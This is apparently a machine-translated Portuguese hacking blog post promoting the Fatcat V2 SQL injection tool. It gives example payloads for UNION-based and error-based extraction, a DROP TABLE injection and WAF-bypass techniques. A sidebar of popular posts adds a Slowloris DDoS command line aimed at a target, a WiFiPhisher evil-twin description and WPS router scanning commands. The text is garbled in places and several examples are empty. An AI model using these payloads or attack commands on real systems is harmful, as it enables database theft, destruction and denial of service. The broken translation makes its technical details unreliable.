Pular para o conteúdo principal

Fatcat V2 Auto [S] ql-Injector


Fatcat é open source aplicação web ferramenta caneta testador disponível gratuitamente para download.Injeção SQL Fatcat é desenvolvido para reduzir os processos de exploração, enquanto vulnerabilidade de injeção SQL e explorando injeção SQL profundamente.
Características de Fatcat V2
  • Ele suporta injeção SQL normais
  • Suporta baseado erro de injeção SQL
  • WAF (Web Application Firewall) manual.
    • C-Style Mysql comentar WAF Bypass
    • Buffer overflow WAF Bypass
    • CRLF WAF Bypass
    • Bypass com Information_schema.statics
    • Bypass com Information_schema.key_column_usage
  • Sua execução no servidor amplamente utilizado que é Linux, Win, Max OS
  • Ele suporta MySQL 5.0
Snap shot de FatCat SQL Injector
Para executar essa ferramenta, por favor fornecer testes de URL, parâmetro (URL vulnerável), contagem de Max coluna e selecione typ injeção. Se você deseja ignorar WAF selecionar qualquer um dos da lista.
SQL breve injeção
Injeção de SQL é uma das vulnerabilidades mais comuns em aplicações PHP. Vulnerabilidade de injeção SQL requer duas falhas por parte do desenvolvedor. - Uma falha para filtrar os dados, uma vez que entra no aplicativo e um fracasso para escapar de dados que entra a aplicação Se atacante tem dia de sorte e encontrou um varible que está nos dados Mysql base e varible é vulnerável a injeção de SQL, então atacante criar uma carga útil como ; DROP TABLE clubhackParty-- -  

Após a execução bem-sucedida da consulta acima ele irá apagar a tabela chamada como clubhack e consulta é olhares como seguinte instrução SQL vaild.
Fatcat Ingrediente
Coleta de Informações de Operação
Para coleta de informações de banco de dados Mysql 5.0 Fatcat chamar as seguintes funções para colher informações DB.      
* Vamos considerar coluna 2 é vulnerável de onde fatcat extrair as informações e dados DB.
  • Para encontrar o número total de colunas apresentam na tabela seguinte Fatcat utilizando a instrução SQL, onde n é o número total de colunas de mesa que está presente na coluna.
  • Ordenar por n + 1
    Fatcat criar uma instrução SQL válida para contar o número de números de colunas presentes. Qual é parece seguinte SQL Statement SQL válido.
    Exemplo: Selecione + 1, 2, 3 + onde + id = 2 + Order + por + 1-- -
    Nota: Esta operação está localizada no número da linha 114 no arquivo dosql.php.
  • Fatcat está usando função Mysql padrão para descobrir o atual versão do Mysql.
  • VERSÃO ()
    Exemplo: Selecione + 1, versão () , 3 + onde + id = 2-- -
    Nota: Encontrar operação versão está localizada na linha número 163 no arquivo dosql.php.
  • Para buscar Mysql nome do usuário atual do MySQL Fatcat usando a função seguinte.
  • User ()
    Exemplo: Selecione + 1, User () , 3 + onde + id = 2-- -
    Nota: User () é o código está localizado no número 174 de linha no arquivo dosql.php.
  • Para encontrar o diretório de dados do banco de dados, usando Fatcat seguinte instrução SQL.
    @@Diretório_de_dados
  • Exemplo: Selecione + 1, @@diretório_de_dados , 3 + onde + id = 2-- -
    Nota: @@diretório_de_dados é o código está localizado no número 182 de linha no arquivo dosql.php.
     
  • Para encontrar Diretório base de banco de dados, usando Fatcat seguinte instrução SQL.
  • @@Basedir
    Exemplo: Selecione + 1, @@basedir , 3 + onde + id = 2-- -
    Nota: @@basedir é o código está localizado no número 189 de linha no arquivo dosql.php.
     
  • Para encontrar o nome do host, usando Fatcat seguinte instrução SQL.
  • @@Hostname
    Exemplo: Selecione + 1, @@hostname , 3 + onde + id = 2-- -
    Nota: @@hostname é o código está localizado no número 203 de linha no arquivo dosql.php.
     
  • Para encontrar a versão do sistema operacional, usando Fatcat seguinte instrução SQL.
  • @@version_compile_os
    Exemplo: Selecione + 1, @@version_compile_os , 3 + onde + id = 2-- -
    Nota: @@version_compile_os é código está localizado no número 209 de linha no arquivo dosql.php.
     
  • Para encontrar Max permitido tamanho do pacote, usando Fatcat seguinte instrução SQL.
  • @@Max_allowed_packet
    Exemplo: Selecione + 1, @@max_allowed_packet , 3 + onde + id = 2-- -
    Nota: @@max_allowed_packet é o código está localizado no número 196 de linha no arquivo dosql.php.
     
  • Para encontrar o nome atual do banco de dados, usando Fatcat seguinte função SQL.
  • Banco de Dados ()
    Exemplo: Selecione + 1, banco de dados () , 3 + onde + id = 2-- -
    Nota: banco de dados () é o código está localizado no número 159 de linha no arquivo dosql.php.
     
Operação Normal injeção SQL (União selecione Injection)
Injeção SQL normal é uma das características importantes do Fatcat. Injeção SQL normal é combinação de declaração da União e Select SQL. Declaração da União nos ajuda a combinar dois conjunto de resultados da instrução SELECT. Injecção SQL normal funciona perfeitamente somente quando qualquer coluna como é vulnerável como no exemplo acima, a coluna 2 é vulnerável.
Sempre que você injetar usando injeção de SQL Normal, Fatcat iniciar automaticamente selecionando coluna vulnerável e começar a explorá-lo profundamente.
Snap Shot para injeção SQL normal:

Digite os parâmetros para executar a injeção de SQL normal e clique injetá-lo! Você vai encontrar o código normal SQL Injection de linha número 93 (nome dosql.php arquivo).
Exemplo: Selecione Nome do usuário DE Users_profile WHERE id = '-1' UNION SELECT MID (GROUP_CONCAT (0x3c62723e, 0x5461626c653a20, nome_tabela, 0x3c62723e, 0x436f6c756d6e3a20, column_name), 1,1024) de INFORMATION_SCHEMA.COLUMNS - + ';
Operação Erro de injeção SQL Baseado (Duplo Injeção Consulta)
Injeção SQL baseado erro é uma das características importantes do Fatcat, ele também é chamado de Duplo Consultas Injection. Alguns injeção baseada no tempo da União se não, para explorar profundamente nessa condição usuário pode usar a injeção SQL baseado erro para recuperar informações DB.
Dupla injeção de consulta SQL é uma vulnerabilidade que usa duas consultas junto envolto em um que confunde a db a um ponto onde ele cospe um erro. Este erro dá-nos a informação de que precisamos para alavancar o banco de dados de todo o caminho até o painel de administração. Por uma questão de fato, pode muito bem despejar todo o banco de dados, se quisermos. Agora consulta duplo definitivamente utiliza menos pedidos que cegam SQL faz, mas não há nenhuma característica group_concat (obviamente) o que significa que deve usar concat com limite para puxá-los para puxar a consulta informações por consulta usando limite de 0,1, limite de 1,1, etc. Eu sei que vocês são bem versados ​​em SQL por isso não vou perder mais tempo em logística.
Por exemplo:
MySQL Query:
Saída:
duplicat e entrada '~' Clubhack_screte '~ 1' for key 1
Onde Clubhack_screte é o nome da tabela
Você vai encontrar o código normal SQL Injection de linha número 330 (nome dosql.php arquivo).
 
WAF (Web Application Firewall) Bypass
De acordo com a OWASP, firewall de aplicação web (WAF) é um aparelho plug-in do servidor, ou filtro que se aplica um conjunto de regras para uma conversa HTTP. Geralmente, essas regras abrangem ataques comuns, como Cross-site Scripting (XSS) e SQL Injection. Ao personalizar as regras para a sua aplicação, muitos ataques podem ser identificadas e bloqueadas. O esforço para realizar essa personalização pode ser significativa e precisa ser mantida como a aplicação é modificada.
Fatcat V2 suporta o seguinte WAF de.
  • AppArmor
  • ModSecurity - Também funciona no Mac OS X, Solaris e outras versões do Unix.
Fatcat V2 suporta o seguinte método de bypass WAF.
  • Estilo C comentário WAF desvio
  • Buffer Overflow WAF desvio
  • CRLF (CR = Retorno de carro e LF = Line Feed) WAF Bypass
  • WAF Bypass com Information_schema.statics
  • WAF Bypass com Information_schema.key_column_usage
Breve Descrição:
1. estilo C MYSQL comentário WAF desvio
  • Esta declaração é chamado / *! MysqlQuery * / é chamado de C-style Comentário
  • Estes estilos executar consultas de MySQL nos comentários.
  • Quando executamos que, o servidor MySQL analisa nossa consulta e ele vai executar a consulta
Exemplo:
A parte em negrito é o exemplo do C-estilo de comentário WAF desvio.
2. Buffer Overflow WAF desvio
  • Uma técnica de exploração, que altera o fluxo de um pedido de substituição de partes da memória.Buffer overflows são uma causa comum de software com defeito. Se os dados escritos em um buffer ultrapassa seu tamanho, espaço de memória adjacente será corrompido e normalmente produzem uma falha.
  • Um invasor pode ser capaz de utilizar uma situação de estouro de buffer para alterar o fluxo de processo de um aplicativo.
Exemplo:
3. CRLF (CR = Retorno de carro e LF = Line Feed) WAF Bypass
  • CRLF (Carriage Return e Line Feed) é uma sequência muito significativa de caracteres para programadores.
  • Uso de CRLF em Mysql para retorno de carro ou alimentação de linha.
  • Não WAF normal não detectar o uso CRLF em injeção de SQL.
Exemplo:
4. Alguns WAF bloqueou a determinadas palavras-chave, como information_schema.tables, para alternativa a essa palavra-chave que temos a seguir outras palavras-chave
  • Information_schema.statics
Esta declaração MYSQL exibir a lista total de Índice das tabelas
Exemplo:
A parte em negrito mostram o uso dos information_schema.statics em fatcat
 
  • Information_schema.key_column_usage
A tabela KEY_COLUMN_USAGE descreve quais as colunas-chave têm restrições.
Exemplo:
A parte em negrito mostram o uso da Information_schema.key_column_usage em fatcat. Usando seguinte link você pode baixar a versão mais recente do Fatcat.
Obrigado pela leitura

Comentários

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p